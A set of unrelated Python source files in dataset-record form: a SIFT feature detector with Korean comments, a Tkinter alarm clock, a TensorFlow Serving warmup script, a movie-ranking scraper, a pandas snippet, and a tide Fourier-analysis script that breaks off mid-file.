dss]])\n xhat = np.linalg.lstsq(-H, dD, rcond = -1)[0]\n # low contrast 제거를 위해 계산.\n Dxhat = target + 0.5 * np.dot(dD.transpose(), xhat)\n #Dxhat = Dxhat / 255.\n # edge response 제거를 위해 계산.\n # 원 논문 기준 H = 2x2 matrix가 맞음.\n det = H[0, 0] * H[1, 1] - H[0, 1] * H[1, 0] # H 의 determinant\n tr = H[0, 0] + H[1, 1] # H의 trace\n threshR = ((r + 1) ** 2)\n if np.abs(xhat[0]) > 0.5 or np.abs(xhat[1]) > 0.5 or np.abs(xhat[2]) > 0.5 \\\n or np.abs(Dxhat) < thresh or det < 0 or (tr ** 2) * r > (det * threshR): # low contrast, edge response 제거\n continue\n else:\n extPy4[j, k, i-1] = 1 # extrema & not low contrast & not edge response\n\n extr_sum = extPy1.sum() + extPy2.sum() + extPy3.sum() + extPy4.sum()\n extr_sum = extr_sum.astype(np.int)\n keypoints = np.zeros((extr_sum, 4)) # 검출된 극값들의 수 만큼 keypoints 정보를 저장할 배열 생성. 정보가 4개\n\n # ---- 과제가 여기 까지 ---- (Keypoints 배열에 저장하는 건 따로 해야함)\n\n magLv1 = np.zeros((doubled.shape[0], doubled.shape[1], 3))\n magLv2 = np.zeros((normal.shape[0], normal.shape[1], 3))\n magLv3 = np.zeros((half.shape[0], half.shape[1], 3))\n magLv4 = np.zeros((quarter.shape[0], quarter.shape[1], 3))\n\n oriLv1 = np.zeros((doubled.shape[0], doubled.shape[1], 3))\n oriLv2 = np.zeros((normal.shape[0], normal.shape[1], 3))\n oriLv3 = np.zeros((half.shape[0], half.shape[1], 3))\n oriLv4 = np.zeros((quarter.shape[0], quarter.shape[1], 3))\n\n dx = np.array([[-1., 0., 1.]]) * 0.5\n dy = np.array([[-1.], [0.], [1.]]) * 0.5\n\n dxDouble = cv2.filter2D(doubled, -1 ,dx)\n dyDouble = cv2.filter2D(doubled, -1, dy)\n dxNormal = cv2.filter2D(normal, -1, dx)\n dyNormal = cv2.filter2D(normal, -1, dy)\n dxHalf = cv2.filter2D(half, -1, dx)\n dyHalf = cv2.filter2D(half, -1, dy)\n dxQuarter = cv2.filter2D(quarter, -1, dx)\n dyQuarter = cv2.filter2D(quarter, -1, dy)\n\n # magnitude / orientation 계산\n for i in range(3):\n magLv1[:, :, i] = np.sqrt((dxDouble ** 2) + (dyDouble ** 2))\n magLv2[:, :, i] = np.sqrt((dxNormal ** 2) + (dyNormal ** 2))\n magLv3[:, :, i] = np.sqrt((dxHalf ** 2) + (dyHalf ** 2))\n magLv4[:, :, i] = np.sqrt((dxQuarter ** 2) + (dyQuarter ** 2))\n oriLv1[:, :, i] = np.arctan2(dxDouble,dyDouble)\n oriLv2[:, :, i] = np.arctan2(dxNormal,dyNormal)\n oriLv3[:, :, i] = np.arctan2(dxHalf,dyHalf)\n oriLv4[:, :, i] = np.arctan2(dxQuarter,dyQuarter)\n count = 0\n\n print('orient assignment')\n\n #Keypoint 방향 할당\n #lv1 pyr\n for i in range(3):\n gausK = cv2.getGaussianKernel(16, 1.5 * lv1sigma[i + 1])\n gausK = np.dot(gausK, gausK.T)\n for j in range(doubled.shape[0]):\n for k in range(doubled.shape[1]):\n if extPy1[j,k,i] == 1:\n orient_hist = np.zeros([36, 1])\n for y in range(-8, 8):\n for x in range(-8, 8):\n if j+y < 0 or j+y > doubled.shape[0]-1 or k+x < 0 or k+x > doubled.shape[1]-1:\n continue\n weighted_mag = magLv1[j+y, k+x, i] * gausK[y+8, x+8]\n bin_idx = int((oriLv1[j+y, k+x, i] * 180 / np.pi) / 10)\n orient_hist[bin_idx] += weighted_mag\n max_val = np.max(orient_hist)\n max_idx = np.argmax(orient_hist)\n keypoints[count, :] = np.array([int(j * 0.5), int(k * 0.5), lv1sigma[i + 1], max_idx])\n count += 1\n #새로운 max value를 찾아서 0.8배보다 큰지 확인\n orient_hist[max_idx] = 0\n new_val = np.max(orient_hist)\n while new_val > 0.8 * max_val: #maxVal 값의 0.8배 이상의 값이면 이 또한 Keypoint의 방향\n new_idx = np.argmax(orient_hist)\n np.append(keypoints,np.array([int(j * 0.5), int(k * 0.5), lv1sigma[i + 1], new_idx]))\n orient_hist[new_idx] = 0\n new_val = np.max(orient_hist)\n\n # lv2 pyr\n for i in range(3):\n gausK = cv2.getGaussianKernel(16, 1.5 * lv2sigma[i + 1])\n gausK = np.dot(gausK, gausK.T)\n for j in range(normal.shape[0]):\n for k in range(normal.shape[1]):\n if extPy2[j, k, i] == 1.:\n orient_hist = np.zeros([36, 1])\n for y in range(-8, 8):\n for x in range(-8, 8):\n if j + y < 0 or j + y > normal.shape[0] - 1 or k + x < 0 or k + x > normal.shape[1] - 1:\n continue\n weighted_mag = magLv2[j + y, k + x, i] * gausK[y + 8, x + 8]\n bin_idx = int((oriLv2[j+y, k+x, i] * 180 / np.pi) / 10)\n orient_hist[bin_idx] += weighted_mag\n max_val = np.max(orient_hist)\n max_idx = np.argmax(orient_hist)\n keypoints[count, :] = np.array([j, k, lv2sigma[i + 1], max_idx])\n count += 1\n # 새로운 max value를 찾아서 0.8배보다 큰지 확인\n orient_hist[max_idx] = 0\n new_val = np.max(orient_hist)\n while new_val > 0.8 * max_val: # maxVal 값의 0.8배 이상의 값이면 이 또한 Keypoint의 방향\n new_idx = np.argmax(orient_hist)\n np.append(keypoints,np.array([j, k, lv2sigma[i + 1], new_idx]))\n orient_hist[new_idx] = 0\n new_val = np.max(orient_hist)\n\n #lv3 pyr\n for i in range(3):\n gausK = cv2.getGaussianKernel(16, 1.5 * lv3sigma[i + 1])\n gausK = np.dot(gausK, gausK.T)\n for j in range(half.shape[0]):\n for k in range(half.shape[1]):\n if extPy3[j, k, i] == 1.:\n orient_hist = np.zeros([36, 1])\n for y in range(-8, 8):\n for x in range(-8, 8):\n if j + y < 0 or j + y > half.shape[0] - 1 or k + x < 0 or k + x > half.shape[1] - 1:\n continue\n weighted_mag = magLv3[j + y, k + x, i] * gausK[y + 8, x + 8]\n bin_idx = int((oriLv3[j+y, k+x, i] * 180 / np.pi) / 10)\n orient_hist[bin_idx] += weighted_mag\n max_val = np.max(orient_hist)\n max_idx = np.argmax(orient_hist)\n keypoints[count, :] = np.array([j*2, k*2, lv3sigma[i + 1], max_idx])\n count += 1\n # 새로운 max value를 찾아서 0.8배보다 큰지 확인\n orient_hist[max_idx] = 0\n new_val = np.max(orient_hist)\n while new_val > 0.8 * max_val: # maxVal 값의 0.8배 이상의 값이면 이 또한 Keypoint의 방향\n new_idx = np.argmax(orient_hist)\n np.append(keypoints,np.array([j*2, k*2, lv3sigma[i + 1], new_idx]))\n orient_hist[new_idx] = 0\n new_val = np.max(orient_hist)\n\n #lv4 pyr\n for i in range(3):\n gausK = cv2.getGaussianKernel(16, 1.5 * lv4sigma[i + 1])\n gausK = np.dot(gausK, gausK.T)\n for j in range(quarter.shape[0]):\n for k in range(quarter.shape[1]):\n if extPy4[j, k, i] == 1.:\n orient_hist = np.zeros([36, 1])\n for y in range(-8, 8):\n for x in range(-8, 8):\n if j + y < 0 or j + y > quarter.shape[0] - 1 or k + x < 0 or k + x > quarter.shape[1] - 1:\n continue\n weighted_mag = magLv4[j + y, k + x, i] * gausK[y + 8, x + 8]\n bin_idx = int((oriLv4[j+y, k+x, i] * 180 / np.pi) / 10)\n orient_hist[bin_idx] += weighted_mag\n max_val = np.max(orient_hist)\n max_idx = np.argmax(orient_hist)\n keypoints[count, :] = np.array([j*4, k*4, lv4sigma[i + 1], max_idx])\n count += 1\n # 새로운 max value를 찾아서 0.8배보다 큰지 확인\n orient_hist[max_idx] = 0\n new_val = np.max(orient_hist)\n while new_val > 0.8 * max_val: # maxVal 값의 0.8배 이상의 값이면 이 또한 Keypoint의 방향\n new_idx = np.argmax(orient_hist)\n np.append(keypoints, np.array([j*4, k*4, lv4sigma[i + 1], new_idx]))\n orient_hist[new_idx] = 0\n new_val = np.max(orient_hist)\n # ----- 여기까지 Keypoints의 위치와 방향을 저장한 배열 Keypoints 생성 완료. ----\n # ----- Keypoint[keycounts, 4] : 각각의 Column은 original scale 기준의 (Y,X), scale(sigma), orientation 을 가짐.\n\n print('Calc descriptor')\n\n #descriptor 구하기\n descriptors = np.zeros((keypoints.shape[0], 128)) #Keypoints의 수만큼 필요, 128개의 설명자 (cell에서의 histogram intensity)\n\n magpyr = np.zeros((normal.shape[0], normal.shape[1], 12)) #extrema를 찾은 DoG image 3개의 magnitude x py 4\n oripyr = np.zeros((normal.shape[0], normal.shape[1], 12))\n\n for i in range(3):\n #(X,y)\n magpyr[:,:,i] = cv2.resize(magLv1[:,:,i], (normal.shape[1], normal.shape[0]), interpolation = cv2.INTER_LINEAR).astype(np.float32)\n oripyr[:,:,i] = cv2.resize(oriLv1[:,:,i], (normal.shape[1], normal.shape[0]), interpolation = cv2.INTER_LINEAR).astype(np.int)\n magpyr[:,:,i+2] = magLv2[:,:,i].astype(np.float32)\n oripyr[:,:,i+2] = oriLv2[:,:,i].astype(np.int)\n magpyr[:,:,i+4] = cv2.resize(magLv3[:,:,i], (normal.shape[1], normal.shape[0]), interpolation = cv2.INTER_LINEAR).astype(np.float32)\n oripyr[:,:,i+4] = cv2.resize(oriLv3[:,:,i], (normal.shape[1], normal.shape[0]), interpolation = cv2.INTER_LINEAR).astype(np.int)\n magpyr[:,:,i+6] = cv2.resize(magLv4[:,:,i], (normal.shape[1], normal.shape[0]), interpolation = cv2.INTER_LINEAR).astype(np.float32)\n oripyr[:,:,i+6] = cv2.resize(oriLv4[:,:,i], (normal.shape[1], normal.shape[0]), interpolation = cv2.INTER_LINEAR).astype(np.int)\n\n for i in range(keypoints.shape[0]):\n gausK = cv2.getGaussianKernel(16, keypoints[i, 2])\n gausK = np.dot(gausK, gausK.T)\n for y in range(-8, 8):\n for x in range(-8, 8):\n theta = keypoints[i,3] * 10 * np.pi / 180.\n xrot = np.round((np.cos(theta) * x) - (np.sin(theta) * y)) # 거리에 따른 회전량(X,Y 좌표 상대 위치)\n yrot = np.round((np.sin(theta) * x) + (np.cos(theta) * y))\n sIdx = np.argmax(totalSig == keypoints[i,2]) #sigma 크기에 따라 0~7\n if int(keypoints[i,0] + yrot) < 0 or int(keypoints[i,0] + yrot) > (normal.shape[0]-1) \\\n or int(keypoints[i,1] + xrot) < 0 or int(keypoints[i,1] + xrot) > (normal.shape[1]-1):\n continue\n #회전된 위치에서의 가중치를 구함.\n weight = magpyr[int(keypoints[i,0]+yrot),int(keypoints[i,1]+xrot), sIdx] * gausK[y+8, x+8]\n # 회전시켰으니 원래의 angle을 빼줌.\n #key에는 원래 angle의 index 저장.(0~35)\n angle = int(oripyr[int(keypoints[i,0]+yrot),int(keypoints[i,1]+xrot), sIdx] * 180 / np.pi / 10) - keypoints[i, 3]\n if angle < 0 :\n angle += 36 #10도 간격으로 분할되었기 때문에, 36을 더해줌.\n\n new_bin = int(angle * 10 / 45)\n yOffset = (y+8) // 4\n xOffset = (x+8) // 4\n descriptors[i, 32 * yOffset + 8 * xOffset + new_bin] += weight\n\n descriptors[i, :] = np.true_divide(descriptors[i, :], np.sum(descriptors[i, :]))\n descriptors[i][np.isnan(descriptors[i,:])] = 0\n descriptors[i][descriptors[i] < 0.2] = 0 #0.2 아래의 값 제거.\n descriptors[i, :] = np.true_divide(descriptors[i, :] , np.sum(descriptors[i, :]))\n descriptors[i][np.isnan(descriptors[i, :])] = 0\n\n return [keypoints, descriptors]\n\nif __name__ == '__main__':\n src = cv2.imread('.\\\\building.jpg')\n gray = cv2.cvtColor(src, cv2.COLOR_BGR2GRAY)\n gray = gray.astype(np.double)\n gray /= 255.\n\n thresh = 0.03\n r = 10. #원 논문에서 값을 10으로 사용\n\n [keypoints, descriptor] = SIFT(gray, thresh = thresh, r = r)\n\n for i in range(len(keypoints)):\n y1 = int(keypoints[i, 0])\n x1 = int(keypoints[i, 1])\n theta = (keypoints[i, 3] * 10. * np.pi) / 180.\n length = keypoints[i, 2] * 5\n x2 = int(x1 + length * np.cos(theta))\n y2 = int(y1 + length * np.sin(theta))\n cv2.arrowedLine(src, (x1, y1), (x2, y2), (0, 0, 255))\n #cv2.circle(src, (int(keypoints[i,1]), int(keypoints[i,0])), int(2 * keypoints[i,2]), (0, 0, 255), 1) # 해당 위치에 원을 그려주는 함수\n #cv2.circle(src, (int(keypoints[i,1]), int(keypoints[i,0])), 2, (0, 0, 255), 1) # 해당 위치에 원을 그려주는 함수\n\n src2 = cv2.imread('.\\\\building_temp.jpg')\n gray2 = cv2.cvtColor(src2, cv2.COLOR_BGR2GRAY)\n gray2 = gray2.astype(np.double) / 255\n\n [keypoints2, descriptor2] = SIFT(gray2, thresh=thresh, r=r)\n\n for i in range(len(keypoints2)):\n y1 = int(keypoints2[i, 0])\n x1 = int(keypoints2[i, 1])\n theta = (keypoints2[i, 3] * 10. * np.pi) / 180.\n length = keypoints2[i, 2] * 5\n x2 = int(x1 + length * np.cos(theta))\n y2 = int(y1 + length * np.sin(theta))\n cv2.arrowedLine(src2, (x1, y1), (x2, y2), (0, 0, 255))\n #cv2.circle(src2, (int(keypoints2[i,1]), int(keypoints2[i,0])), int(2 * keypoints2[i,2]), (0, 0, 255), 1) # 해당 위치에 원을 그려주는 함���\n\n cv2.imshow('src', src)\n cv2.imshow('src2', src2)\n cv2.waitKey()\n cv2.destroyAllWindows()","sub_path":"7주차+자료/SIFT.py","file_name":"SIFT.py","file_ext":"py","file_size_in_byte":28407,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"295645281","text":"#Real time clock uses tkinter master.after() command and a recusive function call\r\n#Alarm Clock, allows URL links + custom title for URL, opens default webbrowser to set URL at the set time\r\n\r\n#Written by Kelly Schmidt\r\n\r\nfrom tkinter import *\r\nfrom tkinter import ttk\r\nimport webbrowser\r\nimport time\r\nimport pickle\r\n\r\n#Class for the main clock display\r\nclass MainDisplay(Frame):\r\n def __init__(self, master = None):\r\n super().__init__(master)\r\n self.master = master\r\n self.grid()\r\n \r\n#Sets theme for all comboboxes\r\n self.tk_setPalette(background = 'bisque4', foreground = 'black')\r\n self.style = ttk.Style()\r\n self.style.theme_use('clam')\r\n self.style.configure('TCombobox', fieldbackground = 'green', background = 'bisque4', foreground = 'white')\r\n\r\n#Initialize and call any methods/attributes that need to be started on program startup\r\n self.hour_list = ['{:02d}'.format(num) for num in range(1, 13)]\r\n self.minute_list = ['{:02d}'.format(num) for num in range(60)]\r\n self.hours = int(time.ctime()[11:13])\r\n self.minutes = int(time.ctime()[14:16])\r\n self.seconds = int(time.ctime()[17:19])\r\n \r\n self.clock = Canvas(self)\r\n self.display = self.clock.create_rectangle(0, 0, 400, 500, fill = 'black')\r\n self.clock_time = self.clock.create_text(175, 150, fill = 'orange', font = ('Verdana', 30))\r\n self.date_display = self.clock.create_text(172, 100, fill = 'orange', font = ('Verdana', 30))\r\n self.clock.grid(row = 0, column = 0, padx = 1, pady = 5, rowspan = 10)\r\n \r\n self.alarm_widgets()\r\n self.main_display()\r\n \r\n def main_display(self):\r\n self.date_text = '{}{}'.format(time.ctime()[:8], int(time.ctime()[8:10]))\r\n if self.hours < 12:\r\n self.clock_text = '{}:{:02d}:{:02d}AM'.format(self.hours, self.minutes, self.seconds)\r\n else:\r\n self.clock_text = '{}:{:02d}:{:02d}PM'.format(self.hours, self.minutes, self.seconds)\r\n \r\n self.clock.itemconfigure(self.clock_time, text = self.clock_text)\r\n self.clock.itemconfigure(self.date_display, text = self.date_text )\r\n self.master.after(1000, self._ticker)\r\n\r\n#updates clock for main display\r\n def _ticker(self):\r\n self.hours = int(time.ctime()[11:13])\r\n self.minutes = int(time.ctime()[14:16])\r\n self.seconds = int(time.ctime()[17:19])\r\n self.main_display()\r\n\r\n#Class for the GUI widgets \r\nclass AlarmWidgets(MainDisplay):\r\n def alarm_widgets(self):\r\n alarm_frame = Frame(self)\r\n alarm_frame.grid(row = 0, column = 1, columnspan = 3)\r\n \r\n self.hour_set = ttk.Combobox(alarm_frame, values = self.hour_list, width = 10)\r\n self.hour_set.set('Set Hour')\r\n self.hour_set.grid(row = 0, column = 0, padx = 2, pady = 2, sticky = 'N')\r\n \r\n self.minute_set = ttk.Combobox(alarm_frame, values = self.minute_list, width = 10)\r\n self.minute_set.set('Set Min.')\r\n self.minute_set.grid(row = 0, column = 1, padx = 2, pady = 2, sticky = 'N')\r\n \r\n self.am_pm = ttk.Combobox(alarm_frame, values = ['AM', 'PM'], width = 5)\r\n self.am_pm.set('AM')\r\n self.am_pm.grid(row = 0, column = 3, padx = 2, pady = 2, sticky = 'N' )\r\n\r\n self.set_alarm_btn = Button(self)\r\n self.set_alarm_btn['text'] = 'Set Alarm'\r\n self.set_alarm_btn['command'] = self.add_alarm\r\n self.set_alarm_btn['bg'] = 'orange'\r\n self.set_alarm_btn.grid(row = 1, column = 2, pady = 2, sticky = 'N')\r\n\r\n self.song_list = ttk.Combobox(self)\r\n self.song_list['width'] = 30\r\n self.song_list.set('Song List')\r\n \r\n try:\r\n with open(r'AlarmClock\\alarmclock.pkl', 'rb') as songadder:\r\n song_adder = pickle.load(songadder)\r\n self.song_list['values'] = [key for key in song_adder.keys()]\r\n except FileNotFoundError:\r\n pass\r\n \r\n self.song_list.grid(row = 2, column = 1, pady = 2, columnspan = 3, sticky = 'N')\r\n\r\n self.add_song_btn = Button(self)\r\n self.add_song_btn['text'] = 'Add URL'\r\n self.add_song_btn['command'] = self.add_url\r\n self.add_song_btn['bg'] = 'orange'\r\n self.add_song_btn.grid(row = 6, column = 2, sticky = 'N')\r\n \r\n self.add_song_entry = Entry(self)\r\n self.add_song_entry['width'] = 30\r\n self.add_song_entry.insert(1, 'Enter URL')\r\n self.add_song_entry.grid(row = 5, column = 1, columnspan = 3, padx = 2, sticky = 'N')\r\n\r\n self.add_title_entry = Entry(self)\r\n self.add_title_entry['width'] = 30\r\n self.add_title_entry.insert(1, 'Enter URL Title')\r\n self.add_title_entry.grid(row = 4, column = 1, columnspan = 3, padx = 2)\r\n \r\n remove_song_btn = Button(self)\r\n remove_song_btn['text'] = 'Remove Song'\r\n remove_song_btn['command'] = self.remove_song\r\n remove_song_btn['bg'] = 'orange'\r\n remove_song_btn.grid(row = 3, column = 2, sticky = 'N')\r\n\r\n#Class that sets/clears and adds URLS to the alarm feature\r\nclass AlarmSet(AlarmWidgets):\r\n def add_alarm(self):\r\n self.clock.delete('alarmtext')\r\n self.clock.delete('titletext')\r\n alarm_hours = int(self.hour_set.get())\r\n alarm_minutes = int(self.minute_set.get())\r\n alarm_ampm = self.am_pm.get()\r\n \r\n self.title_text = self.song_list.get()[:25]\r\n self.alarm_text = 'Alarm: {}:{:02d}:00{}'.format(alarm_hours, alarm_minutes, alarm_ampm)\r\n self.title_display = self.clock.create_text(89 + len(self.title_text), 230, fill = 'cyan', font = ('Verdana', 12), tag = 'titletext')\r\n self.alarm_display = self.clock.create_text(105, 250, fill = 'cyan', font = ('Verdana', 15), tag = 'alarmtext')\r\n self.clock.itemconfigure(self.title_display, text = self.title_text)\r\n self.clock.itemconfigure(self.alarm_display, text = self.alarm_text)\r\n \r\n if alarm_ampm == 'PM' and alarm_hours != 12:\r\n alarm_hours += 12\r\n \r\n alarm_time = abs(((alarm_hours * 360 + alarm_minutes * 60) - (self.hours * 360 + self.minutes * 60) - self.seconds) * 1000)\r\n \r\n self.master.after(alarm_time, self._start_alarm)\r\n self.set_alarm_btn['text'] = 'Clear Alarm'\r\n self.set_alarm_btn['command'] = self.clear_alarm\r\n \r\n def _start_alarm(self):\r\n with open(r'AlarmClock\\alarmclock.pkl', 'rb') as alarmurl:\r\n alarm_url = pickle.load(alarmurl)\r\n\r\n#Checks if there is any text on the Canvas, if so it engages the alarm, if not (alarm was cleared) it doesnt engage the alarm \r\n if self.clock.find_withtag('titletext'):\r\n song_url = alarm_url[self.song_list.get()]\r\n webbrowser.open(url = song_url, autoraise = True) \r\n \r\n def clear_alarm(self):\r\n self.clock.delete(\"alarmtext\") \r\n self.clock.delete('titletext')\r\n self.hour_set.set('Set Hour')\r\n self.minute_set.set('Set Min.')\r\n self.am_pm.set('AM')\r\n self.song_list.set('Song List')\r\n \r\n self.set_alarm_btn['text'] = 'Add Alarm'\r\n self.set_alarm_btn['command'] = self.add_alarm\r\n\r\n def add_url(self):\r\n title_song_dict = {}\r\n add_url = self.add_song_entry.get()\r\n add_title = self.add_title_entry.get()\r\n title_song_dict.setdefault(add_title, add_url)\r\n \r\n try:\r\n with open(r'AlarmClock\\alarmclock.pkl', 'rb') as songadder:\r\n song_adder = pickle.load(songadder)\r\n \r\n for key, value in song_adder.items():\r\n title_song_dict.setdefault(key, value)\r\n except FileNotFoundError:\r\n pass \r\n\r\n with open(r'AlarmClock\\alarmclock.pkl', 'wb') as songadder:\r\n pickle.dump(title_song_dict, songadder, pickle.HIGHEST_PROTOCOL)\r\n \r\n with open(r'AlarmClock\\alarmclock.pkl', 'rb') as songadder:\r\n song_adder = pickle.load(songadder)\r\n\r\n self.song_list['values'] = [key for key in song_adder.keys()]\r\n \r\n self.add_song_btn['text'] = 'Clear Url'\r\n self.add_song_btn['command'] = self.clear_url\r\n\r\n def clear_url(self):\r\n self.add_song_entry.delete(0, END)\r\n self.add_title_entry.delete(0, END)\r\n self.add_song_entry.insert(1, 'Enter Url')\r\n self.add_title_entry.insert(1, 'Enter Title')\r\n self.add_song_btn['text'] = 'Add Url'\r\n self.add_song_btn['command'] = self.add_url\r\n\r\n def remove_song(self):\r\n song_selection = self.song_list.get()\r\n \r\n with open(r'AlarmClock\\alarmclock.pkl', 'rb') as reader:\r\n reader_lines = pickle.load(reader)\r\n if song_selection in reader_lines:\r\n del reader_lines[song_selection]\r\n \r\n with open(r'AlarmClock\\alarmclock.pkl', 'wb') as reader:\r\n pickle.dump(reader_lines, reader, pickle.HIGHEST_PROTOCOL) \r\n \r\n self.song_list['values'] = list(reader_lines.keys())\r\n self.song_list.set('Song List')\r\n\r\nroot = Tk()\r\nbailey = AlarmSet(master = root)\r\nroot.mainloop()\r\n","sub_path":"alarmclock.py","file_name":"alarmclock.py","file_ext":"py","file_size_in_byte":9244,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"33704930","text":"#! /usr/bin/env python\n# -*-coding=utf8-*-\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport tensorflow as tf\nfrom tensorflow_serving.apis import classification_pb2\nfrom tensorflow_serving.apis import inference_pb2\nfrom tensorflow_serving.apis import model_pb2\nfrom tensorflow_serving.apis import predict_pb2\nfrom tensorflow_serving.apis import prediction_log_pb2\nfrom tensorflow_serving.apis import regression_pb2\n\n\nMODEL_NAME = \"easyctr\"\nuser_feature = [\"\"]\nitem_features = [\"\"]\nctx_features = [\"\"]\n\n\ndef _bytes_feature(value):\n return tf.train.Feature(bytes_list=tf.train.BytesList(value=value))\n\n\ndef _int64_feature(value):\n return tf.train.Feature(int64_list=tf.train.Int64List(value=value))\n\n\ndef _float_feature(value):\n return tf.train.Feature(float_list=tf.train.FloatList(value=value))\n\n\n# see https://www.tensorflow.org/tfx/serving/saved_model_warmup\ndef main():\n with tf.python_io.TFRecordWriter(\"tf_serving_warmup_requests\") as writer:\n # replace with one of:\n # predict_pb2.PredictRequest(..)\n # classification_pb2.ClassificationRequest(..)\n # regression_pb2.RegressionRequest(..)\n # inference_pb2.MultiInferenceRequest(..)\n\n request = predict_pb2.PredictRequest()\n request.model_spec.name = MODEL_NAME\n\n request.model_spec.signature_name = 'serving_default'\n input_name = 'inputs'\n example1 = tf.train.Example(\n features=tf.train.Features(\n feature={\n 'user_feature': _bytes_feature(user_feature),\n 'ctx_features': _bytes_feature(ctx_features),\n 'item_features': _bytes_feature(item_features),\n }\n )\n ).SerializeToString()\n print(\"example len = {}\".format(len(example1)))\n examples = [example1]\n request.inputs[input_name].CopyFrom(\n tf.contrib.util.make_tensor_proto(examples, dtype=tf.string))\n log = prediction_log_pb2.PredictionLog(\n predict_log=prediction_log_pb2.PredictLog(request=request))\n writer.write(log.SerializeToString())\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"models/generate_warmup_file.py","file_name":"generate_warmup_file.py","file_ext":"py","file_size_in_byte":2224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"160917387","text":"# -*- coding: utf-8 -*-\r\n\r\n# https://movie.naver.com/movie/sdb/rank/rmovie.nhn \r\n# 으로부터 영화 랭킹 정보를 수집하세요\r\n\"\"\"\r\n1. 사바하\r\n2. 증인\r\n3. 극한직업\r\n...\r\n\"\"\"\r\nimport urllib.request as req\r\nfrom bs4 import BeautifulSoup as bs\r\n\r\nurl = \"https://movie.naver.com/movie/sdb/rank/rmovie.nhn\"\r\nhtml = req.urlopen(url)\r\nsoup = bs(html, 'html.parser') \r\n\r\n#print(soup)\r\ntarget = soup.find_all(\"div\", \r\n attrs={\"class\":\"tit3\"},\r\n limit=10)\r\n\r\nfor index, data in enumerate(target) :\r\n data = str(data.text) \r\n# if index < 10 :\r\n print(f\"{index + 1} : {data.strip()}\")\r\n# else :\r\n# break\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n ","sub_path":"day_09/crawling_05_example.py","file_name":"crawling_05_example.py","file_ext":"py","file_size_in_byte":748,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"62103306","text":"import pandas as pd\nfrom pathlib import Path\nimport datetime\n\npath = str(Path(__file__).parents[2])+\"/materials/esercizi/steps2020.xlsx\"\n\n\ndf = pd.read_excel(path, parse_dates={'TEMPO' : [\"Date\", \"Time\"]}, index_col=\"TEMPO\")\nprint(df)\nts_max = pd.Timestamp(\"2020-01-15 23:59:00\")\nstep_max = df.loc[\"2020-01-15 23:59:00\"]\ndfr=pd.DataFrame({\"TEMPO\": ts_max, \"Steps\": step_max})\ndfr.set_index(keys=\"TEMPO\")\nprint(dfr.transpose())\n\n\n\n\n\n\n","sub_path":"venv/src/solution7.py","file_name":"solution7.py","file_ext":"py","file_size_in_byte":433,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"462750372","text":"import sys\nimport getopt\nimport numpy as np\nimport pandas\nfrom matplotlib import pyplot as plt\nfrom datetime import datetime\nimport csv\n\n\ndef read_file():\n mareas = pandas.read_csv('CO-OPS_8410140_met-2019.csv')\n alturas_totales = mareas['Verified (m)']\n\n alturas_semana_1_enero = alturas_totales[0:168]\n alturas_semana_2_enero = alturas_totales[169:336]\n alturas_ene_feb = alturas_totales[0:1416]\n alturas_mar_abr = alturas_totales[1417:2880]\n return [\n alturas_totales,\n alturas_semana_1_enero,\n alturas_semana_2_enero,\n alturas_ene_feb,\n alturas_mar_abr\n ]\n\n\n\n\ndef store_fft_data(indices, absolutes, angles, output):\n output.writerow([\"Indice\", \"Abs\", \"Angle\"])\n for i in indices:\n output.writerow([i, absolutes[i], angles[i]])\n\n\ndef ak(a_k, f_k):\n return a_k * np.cos(f_k)\n\n\ndef bk(b_k, f_k):\n return -b_k * np.sin(f_k)\n\n\ndef serie_fourier_altura(t, ind, amp, fases, w_0, output, save_data):\n if (save_data is True):\n output.writerow([\"k\", \"O_k\", \"Q_k\", \"A_k\", \"B_k\"])\n acc = 0\n for k in ind:\n a_k = ak(amp[k], fases[k])\n b_k = bk(amp[k], fases[k])\n\n if (save_data is True):\n output.writerow([k, amp[k], fases[k], a_k, b_k])\n\n acc = (a_k * np.cos(w_0 * k * t)) + (b_k * np.sin(w_0 * k * t)) + acc\n\n return acc\n\n\ndef procesar_rango(alturas, n_armonicos, save_data):\n # open files\n fft_writer = None\n sft_writer = None\n if (save_data is True):\n now = int(datetime.now().timestamp())\n fft_file = open(f'resultados/fft_csv_file_{now}.csv', 'w')\n sft_file = open(f'resultados/sft_csv_file_{now}.csv', 'w')\n fft_writer = csv.writer(fft_file)\n sft_writer = csv.writer(sft_file)\n\n # Parametros\n T = len(alturas)\n t = range(0, int(T))\n omega_0 = (2 * np.pi) / T\n\n W = int(T/2)\n\n # Obtencion de la transformada\n alturas_fft = np.fft.fft(alturas)\n h_alturas_fft = np.abs(alturas_fft)\n a_alturas_fft = np.angle(alturas_fft)\n h_alturas_fft_normalizadas = h_alturas_fft / W\n\n # Normalizamos a parte el valor medio, dado que se repite en la muestra\n h_alturas_fft_normalizadas[0] = h_alturas_fft_normalizadas[0]/2\n\n # Seleccion de los armonicos utilizamos solo la mitad de la muestra\n mitad = h_alturas_fft_normalizadas[0:W]\n maximos = np.flip(np.sort(mitad))[0:n_armonicos]\n h_alturas_fft_filtrados = np.where(\n mitad < np.min(maximos),\n 0,\n mitad)\n indices_elementos_filtrados = np.nonzero(h_alturas_fft_filtrados)[0]\n\n # Guardamos los datos de la corrida.\n if (save_data is True):\n store_fft_data(\n indices_elementos_filtrados,\n h_alturas_fft,\n a_alturas_fft,\n fft_writer\n )\n\n # Calculo de las alturas.\n sf_alturas = serie_fourier_altura(\n t,\n indices_elementos_filtrados,\n h_alturas_fft_normalizadas,\n a_alturas_fft,\n omega_0,\n sft_writer,\n save_data\n )\n\n # Error cuadratico medio.\n ecm = np.mean((np.abs(alturas - sf_alturas)**2))\n print(\"ECM: \", ecm)\n\n # Dibujamos las alturas medidas y las alturas estimadas.\n plt.plot(t, sf_alturas, 'r-', t, alturas, 'b--')\n plt.show()\n\n\ndef usage():\n print('\\nUso:')\n print('\\tmain.py -p

-n -s')\n print('\\tmain.py --punto

